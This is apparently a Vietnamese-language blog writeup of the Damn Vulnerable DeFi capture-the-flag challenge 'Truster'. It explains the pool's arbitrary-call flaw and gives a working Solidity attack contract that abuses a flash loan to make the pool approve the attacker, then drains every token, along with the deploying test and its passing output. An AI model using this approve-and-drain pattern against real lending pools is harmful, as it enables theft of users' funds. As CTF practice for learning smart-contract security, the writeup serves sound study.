Skip to content

Damn Vulnerable Defi writeups: 03 - Truster

Posted on:March 12, 2022

Challenge #3 - Truster

Nhiệm vụ: Lần này ta có một pool cho phép flashloan không tính phí. Hiện giờ trong pool có 1M DVT token, ta thì đang không có gì. Mục tiêu của ta là lấy hết số token đó trong pool trong một transaction duy nhất.

Phân tích

Lending pool cung cấp cho chúng ta một hàm flashLoan như sau

function flashLoan(
  uint256 borrowAmount,
  address borrower,
  address target,
  bytes calldata data
)

sau khi thực hiện cho vay thì sẽ tiến hành hoàn trả bằng call với data trên target

damnValuableToken.transfer(borrower, borrowAmount);
target.functionCall(data);

ở đây có một vài điểm ta có thể khai thác:

Do đó ta có hướng khai thác như sau:

Exploit

Chuẩn bị contract tấn công như sau:

contract RektTruster {
  constructor(address poolAddress, address tokenAddress) {
    TrusterLenderPool pool = TrusterLenderPool(poolAddress);
    IERC20 token = IERC20(tokenAddress);
    pool.flashLoan(
      0,
      address(this),
      tokenAddress,
      abi.encodeWithSignature(
        "approve(address,uint256)",
        address(this),
        type(uint256).max
      )
    );
    token.transferFrom(
      poolAddress,
      tx.origin,
      token.balanceOf(poolAddress)
    );
  }
}

Tiến hành deploy là xong:

it("Exploit", async function () {
 /** CODE YOUR EXPLOIT HERE */
 const RektTruster = await ethers.getContractFactory("RektTruster", attacker);
 await RektTruster.deploy(this.pool.address, this.token.address);
});

Check lại kết quả

[Challenge] Truster
Exploit (213ms)


1 passing (705ms)

All done!